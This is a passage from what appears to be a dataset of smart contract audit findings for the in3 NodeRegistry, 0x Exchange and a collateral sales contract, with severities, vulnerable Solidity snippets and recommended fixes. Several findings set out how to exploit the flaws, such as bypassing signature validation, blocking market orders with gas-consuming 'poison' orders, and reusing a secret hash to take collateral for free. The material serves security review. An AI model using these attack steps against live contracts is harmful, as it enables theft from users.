the `signer` of the `url` is replaced by `msg.sender` which in this case is the `owner` of the node. Note that new URL can resolve to the same URL as before (See https://github.com/ConsenSys/slockit-in3-audit-2019-09/issues/36).\\n```\\nif (newURl != keccak256(bytes(node.url))) {\\n\\n // deleting the old entry\\n delete urlIndex[keccak256(bytes(node.url))];\\n\\n // make sure the new url is not already in use\\n require(!urlIndex[newURl].used, ""url is already in use"");\\n\\n UrlInformation memory ui;\\n ui.used = true;\\n ui.signer = msg.sender;\\n urlIndex[newURl] = ui;\\n node.url = \\_url;\\n}\\n```\\n\\nFurthermore, the method emits a `LogNodeRegistered` event when the node structure is updated. However, the event will always emit `msg.sender` as the signer even though that might not be true. For example, if the `url` does not change, the signer can still be another account that was previously registered with `registerNodeFor` and is not necessarily the `owner`.\\n```\\nemit LogNodeRegistered(\\n node.url,\\n \\_props,\\n msg.sender,\\n node.deposit\\n);\\n```\\n\\n```\\nevent LogNodeRegistered(string url, uint props, address signer, uint deposit);\\n```\\n","The `updateNode()` function gets the `signer` as an input used to reference the node structure and this `signer` should be set for the `UrlInformation`.\\n```\\nfunction updateNode(\\n address \\_signer,\\n string calldata \\_url,\\n uint64 \\_props,\\n uint64 \\_timeout,\\n uint64 \\_weight\\n )\\n```\\n\\nThe method should actually only allow to change node properties when `owner==signer` otherwise `updateNode` is bypassing the strict requirements enforced with `registerNodeFor` where e.g. the `url` needs to be signed by the signer in order to register it.\\nThe emitted event should always emit `node.signer` instead of `msg.signer` which can be wrong.\\nThe method should emit its own distinct event `LogNodeUpdated` for audit purposes and to be able to distinguish new node registrations from node structure updates. This might also require software changes to client/node implementations to listen for node updates.",,"```\\nif (newURl != keccak256(bytes(node.url))) {\\n\\n // deleting the old entry\\n delete urlIndex[keccak256(bytes(node.url))];\\n\\n // make sure the new url is not already in use\\n require(!urlIndex[newURl].used, ""url is already in use"");\\n\\n UrlInformation memory ui;\\n ui.used = true;\\n ui.signer = msg.sender;\\n urlIndex[newURl] = ui;\\n node.url = \\_url;\\n}\\n```\\n" +NodeRegistry - In3Node memory n is never used,low,"NodeRegistry `In3Node memory n` is never used inside the modifier `onlyActiveState`.\\n```\\nmodifier onlyActiveState(address \\_signer) {\\n\\n SignerInformation memory si = signerIndex[\\_signer];\\n require(si.stage == Stages.Active, ""address is not an in3-signer"");\\n\\n In3Node memory n = nodes[si.index];\\n assert(nodes[si.index].signer == \\_signer);\\n \\_;\\n}\\n```\\n",Use `n` in the assertion to access the node signer `assert(n.signer == _signer);` or directly access it from storage and avoid copying the struct.,,"```\\nmodifier onlyActiveState(address \\_signer) {\\n\\n SignerInformation memory si = signerIndex[\\_signer];\\n require(si.stage == Stages.Active, ""address is not an in3-signer"");\\n\\n In3Node memory n = nodes[si.index];\\n assert(nodes[si.index].signer == \\_signer);\\n \\_;\\n}\\n```\\n" +NodeRegistry - removeNode unnecessarily casts the nodeIndex to uint64 potentially truncating its value,low,"`removeNode` removes a node from the Nodes array. This is done by copying the last node of the array to the `_nodeIndex` of the node that is to be removed. Finally the node array size is decreased.\\nA Node's index is also referenced in the `SignerInformation` struct. This index needs to be adjusted when removing a node from the array as the last node is copied to the index of the node that is to be removed.\\nWhen adjusting the Node's index in the `SignerInformation` struct `removeNode` casts the index to `uint64`. This is both unnecessary as the struct defines the index as `uint` and theoretically dangerous if a node at an index greater than `uint64_max` is removed. The resulting `SignerInformation` index will be truncated to `uint64` leading to an inconsistency in the contract.\\n```\\nstruct SignerInformation {\\n uint64 lockedTime; /// timestamp until the deposit of an in3-node can not be withdrawn after the node was removed\\n address owner; /// the owner of the node\\n\\n Stages stage; /// state of the address\\n\\n uint depositAmount; /// amount of deposit to be locked, used only after a node had been removed\\n\\n uint index; /// current index-position of the node in the node-array\\n}\\n```\\n\\n```\\n// move the last entry to the removed one.\\nIn3Node memory m = nodes[length - 1];\\nnodes[\\_nodeIndex] = m;\\n\\nSignerInformation storage si = signerIndex[m.signer];\\nsi.index = uint64(\\_nodeIndex);\\nnodes.length--;\\n```\\n",Resolution\\nFixed as per recommendation https://git.slock.it/in3/in3-contracts/commit/6c35dd422e27eec1b1d2f70e328268014cadb515.\\nDo not cast and therefore truncate the index.,,"```\\nstruct SignerInformation {\\n uint64 lockedTime; /// timestamp until the deposit of an in3-node can not be withdrawn after the node was removed\\n address owner; /// the owner of the node\\n\\n Stages stage; /// state of the address\\n\\n uint depositAmount; /// amount of deposit to be locked, used only after a node had been removed\\n\\n uint index; /// current index-position of the node in the node-array\\n}\\n```\\n" +BlockhashRegistry- assembly code can be optimized,low,"The following code can be optimized by removing `mload` and mstore:\\n```\\nrequire(first > 0xf7, ""invalid offset"");\\nuint8 offset = first - 0xf7 + 2;\\n\\n/// we are using assembly because it's the most efficent way to access the parent blockhash within the rlp-encoded blockheader\\n// solium-disable-next-line security/no-inline-assembly\\nassembly { // solhint-disable-line no-inline-assembly\\n // mstore to get the memory pointer of the blockheader to 0x20\\n mstore(0x20, \\_blockheader)\\n\\n // we load the pointer we just stored\\n // then we add 0x20 (32 bytes) to get to the start of the blockheader\\n // then we add the offset we calculated\\n // and load it to the parentHash variable\\n parentHash :=mload(\\n add(\\n add(\\n mload(0x20), 0x20\\n ), offset)\\n )\\n}\\n```\\n","```\\nassembly { // solhint-disable-line no-inline-assembly\\n // mstore to get the memory pointer of the blockheader to 0x20\\n //mstore(0x20, \\_blockheader) //@audit should assign 0x20ptr to variable first and use it.\\n\\n // we load the pointer we just stored\\n // then we add 0x20 (32 bytes) to get to the start of the blockheader\\n // then we add the offset we calculated\\n // and load it to the parentHash variable\\n parentHash :=mload(\\n add(\\n add(\\n \\_blockheader, 0x20\\n ), offset)\\n )\\n }\\n```\\n",,"```\\nrequire(first > 0xf7, ""invalid offset"");\\nuint8 offset = first - 0xf7 + 2;\\n\\n/// we are using assembly because it's the most efficent way to access the parent blockhash within the rlp-encoded blockheader\\n// solium-disable-next-line security/no-inline-assembly\\nassembly { // solhint-disable-line no-inline-assembly\\n // mstore to get the memory pointer of the blockheader to 0x20\\n mstore(0x20, \\_blockheader)\\n\\n // we load the pointer we just stored\\n // then we add 0x20 (32 bytes) to get to the start of the blockheader\\n // then we add the offset we calculated\\n // and load it to the parentHash variable\\n parentHash :=mload(\\n add(\\n add(\\n mload(0x20), 0x20\\n ), offset)\\n )\\n}\\n```\\n" +BlockhashRegistry - Existing blockhashes can be overwritten,low,"Last 256 blocks, that are available in the EVM environment, are stored in `BlockhashRegistry` by calling `snapshot()` or `saveBlockNumber(uint _blockNumber)` functions. Older blocks are recreated by calling `recreateBlockheaders`.\\nThe methods will overwrite existing blockhashes.\\n```\\nfunction saveBlockNumber(uint \\_blockNumber) public {\\n\\n bytes32 bHash = blockhash(\\_blockNumber);\\n\\n require(bHash != 0x0, ""block not available"");\\n\\n blockhashMapping[\\_blockNumber] = bHash;\\n emit LogBlockhashAdded(\\_blockNumber, bHash);\\n}\\n```\\n\\n```\\nblockhashMapping[bnr] = calculatedHash;\\n```\\n","Resolution\\nAddressed with 80bb6ecf and 17d450cf by checking if blockhash exists and changing the `assert` to `require`.\\nIf a block is already saved in the smart contract, it can be checked and a SSTORE can be prevented to save gas. Require that blocknumber hash is not stored.\\n```\\nrequire(blockhashMapping[\\_blockNumber] == 0x0, ""block already saved"");\\n```\\n",,"```\\nfunction saveBlockNumber(uint \\_blockNumber) public {\\n\\n bytes32 bHash = blockhash(\\_blockNumber);\\n\\n require(bHash != 0x0, ""block not available"");\\n\\n blockhashMapping[\\_blockNumber] = bHash;\\n emit LogBlockhashAdded(\\_blockNumber, bHash);\\n}\\n```\\n" +An account that confirms a transaction via AssetProxyOwner can indefinitely block that transaction,high,"When a transaction reaches the required number of confirmations in `confirmTransaction()`, its confirmation time is recorded:\\n```\\n/// @dev Allows an owner to confirm a transaction.\\n/// @param transactionId Transaction ID.\\nfunction confirmTransaction(uint256 transactionId)\\n public\\n ownerExists(msg.sender)\\n transactionExists(transactionId)\\n notConfirmed(transactionId, msg.sender)\\n notFullyConfirmed(transactionId)\\n{\\n confirmations[transactionId][msg.sender] = true;\\n emit Confirmation(msg.sender, transactionId);\\n if (isConfirmed(transactionId)) {\\n \\_setConfirmationTime(transactionId, block.timestamp);\\n }\\n}\\n```\\n\\nBefore the time lock has elapsed and the transaction is executed, any of the owners that originally confirmed the transaction can revoke their confirmation via revokeConfirmation():\\n```\\n/// @dev Allows an owner to revoke a confirmation for a transaction.\\n/// @param transactionId Transaction ID.\\nfunction revokeConfirmation(uint256 transactionId)\\n public\\n ownerExists(msg.sender)\\n confirmed(transactionId, msg.sender)\\n notExecuted(transactionId)\\n{\\n confirmations[transactionId][msg.sender] = false;\\n emit Revocation(msg.sender, transactionId);\\n}\\n```\\n\\nImmediately after, that owner can call `confirmTransaction()` again, which will reset the confirmation time and thus the time lock.\\nThis is especially troubling in the case of a single compromised key, but it's also an issue for disagreement among owners, where any m of the n owners should be able to execute transactions but could be blocked.\\nMitigations\\nOnly an owner can do this, and that owner has to be part of the group that originally confirmed the transaction. This means the malicious owner may have to front run the others to make sure they're in that initial confirmation set.\\nEven once a malicious owner is in position to execute this perpetual delay, they need to call `revokeConfirmation()` and `confirmTransaction()` again each time. Another owner can attempt to front the attacker and execute their own `confirmTransaction()` immediately after the `revokeConfirmation()` to regain control.","There are several ways to address this, but to best preserve the original `MultiSigWallet` semantics, once a transaction has reached the required number of confirmations, it should be impossible to revoke confirmations. In the original implementation, this is enforced by immediately executing the transaction when the final confirmation is received.",,"```\\n/// @dev Allows an owner to confirm a transaction.\\n/// @param transactionId Transaction ID.\\nfunction confirmTransaction(uint256 transactionId)\\n public\\n ownerExists(msg.sender)\\n transactionExists(transactionId)\\n notConfirmed(transactionId, msg.sender)\\n notFullyConfirmed(transactionId)\\n{\\n confirmations[transactionId][msg.sender] = true;\\n emit Confirmation(msg.sender, transactionId);\\n if (isConfirmed(transactionId)) {\\n \\_setConfirmationTime(transactionId, block.timestamp);\\n }\\n}\\n```\\n" +Orders with signatures that require regular validation can have their validation bypassed if the order is partially filled,high,"The signature types `Wallet`, `Validator`, and `EIP1271Wallet` require explicit validation to authorize each action performed on a given order. This means that if an order was signed using one of these methods, the `Exchange` must perform a validation step on the signature each time the order is submitted for a partial fill. In contrast, the other canonical signature types (EIP712, `EthSign`, and PreSigned) are only required to be validated by the `Exchange` on the order's first fill; subsequent fills take the order's existing fill amount as implicit validation that the order has a valid, published signature.\\nThis re-validation step for `Wallet`, `Validator`, and `EIP1271Wallet` signatures is intended to facilitate their use with contracts whose validation depends on some state that may change over time. For example, a validating contract may call into a price feed and determine that some order is invalid if its price deviates from some expected range. In this case, the repeated validation allows 0x users to make orders with custom fill conditions which are evaluated at run-time.\\nWe found that if the sender provides the contract with an invalid signature after the order in question has already been partially filled, the regular validation check required for `Wallet`, `Validator`, and `EIP1271Wallet` signatures can be bypassed entirely.\\nSignature validation takes place in `MixinExchangeCore._assertFillableOrder`. A signature is only validated if it passes the following criteria:\\n```\\n// Validate either on the first fill or if the signature type requires\\n// regular validation.\\naddress makerAddress = order.makerAddress;\\nif (orderInfo.orderTakerAssetFilledAmount == 0 ||\\n \\_doesSignatureRequireRegularValidation(\\n orderInfo.orderHash,\\n makerAddress,\\n signature\\n )\\n) {\\n```\\n\\nIn effect, signature validation only occurs if:\\n`orderInfo.orderTakerAssetFilledAmount == 0` OR\\n`_doesSignatureRequireRegularValidation(orderHash, makerAddress, signature)`\\nIf an order is partially filled, the first condition will evaluate to false. Then, that order's signature will only be validated if `_doesSignatureRequireRegularValidation` evaluates to true:\\n```\\nfunction \\_doesSignatureRequireRegularValidation(\\n bytes32 hash,\\n address signerAddress,\\n bytes memory signature\\n)\\n internal\\n pure\\n returns (bool needsRegularValidation)\\n{\\n // Read the signatureType from the signature\\n SignatureType signatureType = \\_readSignatureType(\\n hash,\\n signerAddress,\\n signature\\n );\\n\\n // Any signature type that makes an external call needs to be revalidated\\n // with every partial fill\\n needsRegularValidation =\\n signatureType == SignatureType.Wallet ||\\n signatureType == SignatureType.Validator ||\\n signatureType == SignatureType.EIP1271Wallet;\\n return needsRegularValidation;\\n}\\n```\\n\\nThe `SignatureType` returned from `_readSignatureType` is directly cast from the final byte of the passed-in signature. Any value that does not cast to `Wallet`, `Validator`, and `EIP1271Wallet` will cause `_doesSignatureRequireRegularValidation` to return false, skipping validation.\\nThe result is that an order whose signature requires regular validation can be forced to skip validation if it has been partially filled, by passing in an invalid signature.","There are a few options for remediation:\\nHave the `Exchange` validate the provided signature every time an order is filled.\\nRecord the first seen signature type or signature hash for each order, and check that subsequent actions are submitted with a matching signature.\\nThe first option requires the fewest changes, and does not require storing additional state. While this does mean some additional cost validating subsequent signatures, we feel the increase in flexibility is well worth it, as a maker could choose to create multiple valid signatures for use across different order books.",,"```\\n// Validate either on the first fill or if the signature type requires\\n// regular validation.\\naddress makerAddress = order.makerAddress;\\nif (orderInfo.orderTakerAssetFilledAmount == 0 ||\\n \\_doesSignatureRequireRegularValidation(\\n orderInfo.orderHash,\\n makerAddress,\\n signature\\n )\\n) {\\n```\\n" +Changing the owners or required confirmations in the AssetProxyOwner can unconfirm a previously confirmed transaction,medium,"Once a transaction has been confirmed in the `AssetProxyOwner`, it cannot be executed until a lock period has passed. During that time, any change to the number of required confirmations will cause this transaction to no longer be executable.\\nIf the number of required confirmations was decreased, then one or more owners will have to revoke their confirmation before the transaction can be executed.\\nIf the number of required confirmations was increased, then additional owners will have to confirm the transaction, and when the new required number of confirmations is reached, a new confirmation time will be recorded, and thus the time lock will restart.\\nSimilarly, if an owner that had previously confirmed the transaction is replaced, the number of confirmations will drop for existing transactions, and they will need to be confirmed again.\\nThis is not disastrous, but it's almost certainly unintended behavior and may make it difficult to make changes to the multisig owners and parameters.\\n`executeTransaction()` requires that at the time of execution, the transaction is confirmed:\\n```\\nfunction executeTransaction(uint256 transactionId)\\n public\\n notExecuted(transactionId)\\n fullyConfirmed(transactionId)\\n```\\n\\n`isConfirmed()` checks for exact equality with the number of required confirmations. Having too many confirmations is just as bad as too few:\\n```\\n/// @dev Returns the confirmation status of a transaction.\\n/// @param transactionId Transaction ID.\\n/// @return Confirmation status.\\nfunction isConfirmed(uint256 transactionId)\\n public\\n view\\n returns (bool)\\n{\\n uint256 count = 0;\\n for (uint256 i = 0; i < owners.length; i++) {\\n if (confirmations[transactionId][owners[i]]) {\\n count += 1;\\n }\\n if (count == required) {\\n return true;\\n }\\n }\\n}\\n```\\n\\nIf additional confirmations are required to reconfirm a transaction, that resets the time lock:\\n```\\n/// @dev Allows an owner to confirm a transaction.\\n/// @param transactionId Transaction ID.\\nfunction confirmTransaction(uint256 transactionId)\\n public\\n ownerExists(msg.sender)\\n transactionExists(transactionId)\\n notConfirmed(transactionId, msg.sender)\\n notFullyConfirmed(transactionId)\\n{\\n confirmations[transactionId][msg.sender] = true;\\n emit Confirmation(msg.sender, transactionId);\\n if (isConfirmed(transactionId)) {\\n \\_setConfirmationTime(transactionId, block.timestamp);\\n }\\n}\\n```\\n","As in https://github.com/ConsenSys/0x-v3-audit-2019-09/issues/39, the semantics of the original `MultiSigWallet` were that once a transaction is fully confirmed, it's immediately executed. The time lock means this is no longer possible, but it is possible to record that the transaction is confirmed and never allow this to change. In fact, the confirmation time already records this. Once the confirmation time is non-zero, a transaction should always be considered confirmed.",,```\\nfunction executeTransaction(uint256 transactionId)\\n public\\n notExecuted(transactionId)\\n fullyConfirmed(transactionId)\\n```\\n +Reentrancy in executeTransaction() Won't Fix,medium,"In `MixinTransactions`, `executeTransaction()` and `batchExecuteTransactions()` do not have the `nonReentrant` modifier. Because of that, it is possible to execute nested transactions or call these functions during other reentrancy attacks on the exchange. The reason behind that decision is to be able to call functions with `nonReentrant` modifier as delegated transactions.\\nNested transactions are partially prevented with a separate check that does not allow transaction execution if the exchange is currently in somebody else's context:\\n```\\n// Prevent `executeTransaction` from being called when context is already set\\naddress currentContextAddress\\_ = currentContextAddress;\\nif (currentContextAddress\\_ != address(0)) {\\n LibRichErrors.rrevert(LibExchangeRichErrors.TransactionInvalidContextError(\\n transactionHash,\\n currentContextAddress\\_\\n ));\\n}\\n```\\n\\nThis check still leaves some possibility of reentrancy. Allowing that behavior is dangerous and may create possible attack vectors in the future.",Add a new modifier to `executeTransaction()` and `batchExecuteTransactions()` which is similar to `nonReentrant` but uses different storage slot.,,"```\\n// Prevent `executeTransaction` from being called when context is already set\\naddress currentContextAddress\\_ = currentContextAddress;\\nif (currentContextAddress\\_ != address(0)) {\\n LibRichErrors.rrevert(LibExchangeRichErrors.TransactionInvalidContextError(\\n transactionHash,\\n currentContextAddress\\_\\n ));\\n}\\n```\\n" +“Poison” order that consumes gas can block market trades Won't Fix,medium,"The market buy/sell functions gather a list of orders together for the same asset and try to fill them in order until a target amount has been traded.\\nThese functions use `MixinWrapperFunctions._fillOrderNoThrow()` to attempt to fill each order but ignore failures. This way, if one order is unfillable for some reason, the overall market order can still succeed by filling other orders.\\nOrders can still force `_fillOrderNoThrow()` to revert by using an external contract for signature validation and having that contract consume all available gas.\\nThis makes it possible to advertise a “poison” order for a low price that will block all market orders from succeeding. It's reasonable to assume that off-chain order books will automatically include the best prices when constructing market orders, so this attack would likely be quite effective. Note that such an attack costs the attacker nothing because all they need is an on-chain contract that consumers all available gas (maybe via an assert). This makes it a very appealing attack vector for, e.g., an order book that wants to temporarily disable a competitor.\\nDetails\\n`_fillOrderNoThrow()` forwards all available gas when filling the order:\\n```\\n// ABI encode calldata for `fillOrder`\\nbytes memory fillOrderCalldata = abi.encodeWithSelector(\\n IExchangeCore(address(0)).fillOrder.selector,\\n order,\\n takerAssetFillAmount,\\n signature\\n);\\n\\n(bool didSucceed, bytes memory returnData) = address(this).delegatecall(fillOrderCalldata);\\n```\\n\\nSimilarly, when the `Exchange` attempts to fill an order that requires external signature validation (Wallet, `Validator`, or `EIP1271Wallet` signature types), it forwards all available gas:\\n```\\n(bool didSucceed, bytes memory returnData) = verifyingContractAddress.staticcall(callData);\\n```\\n\\nIf the verifying contract consumes all available gas, it can force the overall transaction to revert.\\nPedantic Note\\nTechnically, it's impossible to consume all remaining gas when called by another contract because the EVM holds back a small amount, but even at the block gas limit, the amount held back would be insufficient to complete the transaction.",Constrain the gas that is forwarded during signature validation. This can be constrained either as a part of the signature or as a parameter provided by the taker.,,"```\\n// ABI encode calldata for `fillOrder`\\nbytes memory fillOrderCalldata = abi.encodeWithSelector(\\n IExchangeCore(address(0)).fillOrder.selector,\\n order,\\n takerAssetFillAmount,\\n signature\\n);\\n\\n(bool didSucceed, bytes memory returnData) = address(this).delegatecall(fillOrderCalldata);\\n```\\n" +Front running in matchOrders() Won't Fix,medium,"Calls to `matchOrders()` are made to extract profit from the price difference between two opposite orders: left and right.\\n```\\nfunction matchOrders(\\n LibOrder.Order memory leftOrder,\\n LibOrder.Order memory rightOrder,\\n bytes memory leftSignature,\\n bytes memory rightSignature\\n)\\n```\\n\\nThe caller only pays protocol and transaction fees, so it's almost always profitable to front run every call to `matchOrders()`. That would lead to gas auctions and would make `matchOrders()` difficult to use.",Consider adding a commit-reveal scheme to `matchOrders()` to stop front running altogether.,,"```\\nfunction matchOrders(\\n LibOrder.Order memory leftOrder,\\n LibOrder.Order memory rightOrder,\\n bytes memory leftSignature,\\n bytes memory rightSignature\\n)\\n```\\n" +The Exchange owner should not be able to call executeTransaction or batchExecuteTransaction Won't Fix,medium,"If the owner calls either of these functions, the resulting `delegatecall` can pass `onlyOwner` modifiers even if the transaction signer is not the owner. This is because, regardless of the `contextAddress` set through `_executeTransaction`, the `onlyOwner` modifier checks `msg.sender`.\\n`_executeTransaction` sets the context address to the signer address, which is not `msg.sender` in this case:\\n```\\n// Set the current transaction signer\\naddress signerAddress = transaction.signerAddress;\\n\\_setCurrentContextAddressIfRequired(signerAddress, signerAddress);\\n```\\n\\nThe resulting `delegatecall` could target an admin function like this one:\\n```\\n/// @dev Registers an asset proxy to its asset proxy id.\\n/// Once an asset proxy is registered, it cannot be unregistered.\\n/// @param assetProxy Address of new asset proxy to register.\\nfunction registerAssetProxy(address assetProxy)\\n external\\n onlyOwner\\n{\\n // Ensure that no asset proxy exists with current id.\\n bytes4 assetProxyId = IAssetProxy(assetProxy).getProxyId();\\n address currentAssetProxy = \\_assetProxies[assetProxyId];\\n if (currentAssetProxy != address(0)) {\\n LibRichErrors.rrevert(LibExchangeRichErrors.AssetProxyExistsError(\\n assetProxyId,\\n currentAssetProxy\\n ));\\n }\\n \\n // Add asset proxy and log registration.\\n \\_assetProxies[assetProxyId] = assetProxy;\\n emit AssetProxyRegistered(\\n assetProxyId,\\n assetProxy\\n );\\n}\\n```\\n\\nThe `onlyOwner` modifier does not check the context address, but checks msg.sender:\\n```\\nfunction \\_assertSenderIsOwner()\\n internal\\n view\\n{\\n if (msg.sender != owner) {\\n LibRichErrors.rrevert(LibOwnableRichErrors.OnlyOwnerError(\\n msg.sender,\\n owner\\n ));\\n }\\n}\\n```\\n",Add a check to `_executeTransaction` that prevents the owner from calling this function.,,"```\\n// Set the current transaction signer\\naddress signerAddress = transaction.signerAddress;\\n\\_setCurrentContextAddressIfRequired(signerAddress, signerAddress);\\n```\\n" +"By manipulating the gas limit, relayers can affect the outcome of ZeroExTransactions Won't Fix",low,"ZeroExTransactions are meta transactions supported by the `Exchange`. They do not require that they are executed with a specific amount of gas, so the transaction relayer can choose how much gas to provide. By choosing a low gas limit, a relayer can affect the outcome of the transaction.\\nA `ZeroExTransaction` specifies a signer, an expiration, and call data for the transaction:\\n```\\nstruct ZeroExTransaction {\\n uint256 salt; // Arbitrary number to ensure uniqueness of transaction hash.\\n uint256 expirationTimeSeconds; // Timestamp in seconds at which transaction expires.\\n uint256 gasPrice; // gasPrice that transaction is required to be executed with.\\n address signerAddress; // Address of transaction signer.\\n bytes data; // AbiV2 encoded calldata.\\n}\\n```\\n\\nIn `MixinTransactions._executeTransaction()`, all available gas is forwarded in the delegate call, and the transaction is marked as executed:\\n```\\ntransactionsExecuted[transactionHash] = true;\\n(bool didSucceed, bytes memory returnData) = address(this).delegatecall(transaction.data);\\n```\\n\\nA likely attack vector for this is front running a `ZeroExTransaction` that ultimately invokes `_fillNoThrow()`. In this scenario, an attacker sees the call to `executeTransaction()` and makes their own call with a lower gas limit, causing the order being filled to run out of gas but allowing the transaction as a whole to succeed.\\nIf such an attack is successful, the `ZeroExTransaction` cannot be replayed, so the signer must produce a new signature and try again, ad infinitum.","Resolution\\nFrom the development team:\\nWhile this is an annoyance when used in combination with `marketBuyOrdersNoThrow` and `marketSellOrdersNoThrow`, it does not seem worth it to add a `gasLimit` to 0x transactions for this reason alone. Instead, this quirk should be documented along with a recommendation to use the `fillOrKill` variants of each market fill function when used in combination with 0x transactions.\\nAdd a `gasLimit` field to `ZeroExTransaction` and forward exactly that much gas via `delegatecall`. (Note that you must explicitly check that sufficient gas is available because the EVM allows you to supply a gas parameter that exceeds the actual remaining gas.)",,```\\nstruct ZeroExTransaction {\\n uint256 salt; // Arbitrary number to ensure uniqueness of transaction hash.\\n uint256 expirationTimeSeconds; // Timestamp in seconds at which transaction expires.\\n uint256 gasPrice; // gasPrice that transaction is required to be executed with.\\n address signerAddress; // Address of transaction signer.\\n bytes data; // AbiV2 encoded calldata.\\n}\\n```\\n +Modifier ordering plays a significant role in modifier efficacy,low,"The `nonReentrant` and `refundFinalBalance` modifiers always appear together across the 0x monorepo. When used, they invariably appear with `nonReentrant` listed first, followed by `refundFinalBalance`. This specific order appears inconsequential at first glance but is actually important. The order of execution is as follows:\\nThe `nonReentrant` modifier runs (_lockMutexOrThrowIfAlreadyLocked).\\nIf `refundFinalBalance` had a prefix, it would run now.\\nThe function itself runs.\\nThe `refundFinalBalance` modifier runs (_refundNonZeroBalanceIfEnabled).\\nThe `nonReentrant` modifier runs (_unlockMutex).\\nThe fact that the `refundFinalBalance` modifier runs before the mutex is unlocked is of particular importance because it potentially invokes an external call, which may reenter. If the order of the two modifiers were flipped, the mutex would unlock before the external call, defeating the purpose of the reentrancy guard.\\n```\\nnonReentrant\\nrefundFinalBalance\\n```\\n","Resolution\\nThis is fixed in 0xProject/0x-monorepo#2228 by introducing a new modifier that combines the two: `refundFinalBalance`.\\nAlthough the order of the modifiers is correct as-is, this pattern introduces cognitive overhead when making or reviewing changes to the 0x codebase. Because the two modifiers always appear together, it may make sense to combine the two into a single modifier where the order of operations is explicit.",,```\\nnonReentrant\\nrefundFinalBalance\\n```\\n +Several overflows in LibBytes,low,"Several functions in `LibBytes` have integer overflows.\\n`LibBytes.readBytesWithLength` returns a pointer to a `bytes` array within an existing `bytes` array at some given `index`. The length of the nested array is added to the given `index` and checked against the parent array to ensure the data in the nested array is within the bounds of the parent. However, because the addition can overflow, the bounds check can be bypassed to return an array that points to data out of bounds of the parent array.\\n```\\nif (b.length < index + nestedBytesLength) {\\n LibRichErrors.rrevert(LibBytesRichErrors.InvalidByteOperationError(\\n LibBytesRichErrors\\n .InvalidByteOperationErrorCodes.LengthGreaterThanOrEqualsNestedBytesLengthRequired,\\n b.length,\\n index + nestedBytesLength\\n ));\\n}\\n```\\n\\nThe following functions have similar issues:\\n`readAddress`\\n`writeAddress`\\n`readBytes32`\\n`writeBytes32`\\n`readBytes4`","An overflow check should be added to the function. Alternatively, because `readBytesWithLength` does not appear to be used anywhere in the 0x project, the function should be removed from `LibBytes`. Additionally, the following functions in `LibBytes` are also not used and should be considered for removal:\\n`popLast20Bytes`\\n`writeAddress`\\n`writeBytes32`\\n`writeUint256`\\n`writeBytesWithLength`\\n`deepCopyBytes`",,"```\\nif (b.length < index + nestedBytesLength) {\\n LibRichErrors.rrevert(LibBytesRichErrors.InvalidByteOperationError(\\n LibBytesRichErrors\\n .InvalidByteOperationErrorCodes.LengthGreaterThanOrEqualsNestedBytesLengthRequired,\\n b.length,\\n index + nestedBytesLength\\n ));\\n}\\n```\\n" +NSignatureTypes enum value bypasses Solidity safety checks Won't Fix,low,"The `ISignatureValidator` contract defines an enum `SignatureType` to represent the different types of signatures recognized within the exchange. The final enum value, `NSignatureTypes`, is not a valid signature type. Instead, it is used by `MixinSignatureValidator` to check that the value read from the signature is a valid enum value. However, Solidity now includes its own check for enum casting, and casting a value over the maximum enum size to an enum is no longer possible.\\nBecause of the added `NSignatureTypes` value, Solidity's check now recognizes `0x08` as a valid `SignatureType` value.\\nThe check is made here:\\n```\\n// Ensure signature is supported\\nif (uint8(signatureType) >= uint8(SignatureType.NSignatureTypes)) {\\n LibRichErrors.rrevert(LibExchangeRichErrors.SignatureError(\\n LibExchangeRichErrors.SignatureErrorCodes.UNSUPPORTED,\\n hash,\\n signerAddress,\\n signature\\n ));\\n}\\n```\\n","The check should be removed, as should the `SignatureTypes.NSignatureTypes` value.",,"```\\n// Ensure signature is supported\\nif (uint8(signatureType) >= uint8(SignatureType.NSignatureTypes)) {\\n LibRichErrors.rrevert(LibExchangeRichErrors.SignatureError(\\n LibExchangeRichErrors.SignatureErrorCodes.UNSUPPORTED,\\n hash,\\n signerAddress,\\n signature\\n ));\\n}\\n```\\n" +Intentional secret reuse can block borrower and lender from accepting liquidation payment,high,"For Dave (the liquidator) to claim the collateral he's purchasing, he must reveal secret D. Once that secret is revealed, Alice and Bob (the borrower and lender) can claim the payment.\\nSecrets must be provided via the `Sales.provideSecret()` function:\\n```\\n function provideSecret(bytes32 sale, bytes32 secret\\_) external {\\n require(sales[sale].set);\\n if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashA) { secretHashes[sale].secretA = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashB) { secretHashes[sale].secretB = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashC) { secretHashes[sale].secretC = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashD) { secretHashes[sale].secretD = secret\\_; }\\n else { revert(); }\\n }\\n```\\n\\nNote that if Dave chooses the same secret hash as either Alice, Bob, or Charlie (arbiter), there is no way to set `secretHashes[sale].secretD` because one of the earlier conditionals will execute.\\nFor Alice and Bob to later receive payment, they must be able to provide Dave's secret:\\n```\\n function accept(bytes32 sale) external {\\n require(!accepted(sale));\\n require(!off(sale));\\n require(hasSecrets(sale));\\n require(sha256(abi.encodePacked(secretHashes[sale].secretD)) == secretHashes[sale].secretHashD);\\n```\\n\\nDave can exploit this to obtain the collateral for free:\\nDave looks at Alice's secret hashes to see which will be used in the sale.\\nDave begins the liquidation process, using the same secret hash.\\nAlice and Bob reveal their secrets A and B through the process of moving the collateral.\\nDave now knows the preimage for the secret hash he provided. It was revealed by Alice already.\\nDave uses that secret to obtain the collateral.\\nAlice and Bob now want to receive payment, but they're unable to provide Dave's secret to the `Sales` smart contract due to the order of conditionals in `provideSecret()`.\\nAfter an expiration, Dave can claim a refund.\\nMitigating factors\\nAlice and Bob could notice that Dave chose a duplicate secret hash and refuse to proceed with the sale. This is not something they are likely to do.",Either change the way `provideSecret()` works to allow for duplicate secret hashes or reject duplicate hashes in `create()`.,,"```\\n function provideSecret(bytes32 sale, bytes32 secret\\_) external {\\n require(sales[sale].set);\\n if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashA) { secretHashes[sale].secretA = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashB) { secretHashes[sale].secretB = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashC) { secretHashes[sale].secretC = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashD) { secretHashes[sale].secretD = secret\\_; }\\n else { revert(); }\\n }\\n```\\n" +There is no way to convert between custom and non-custom funds 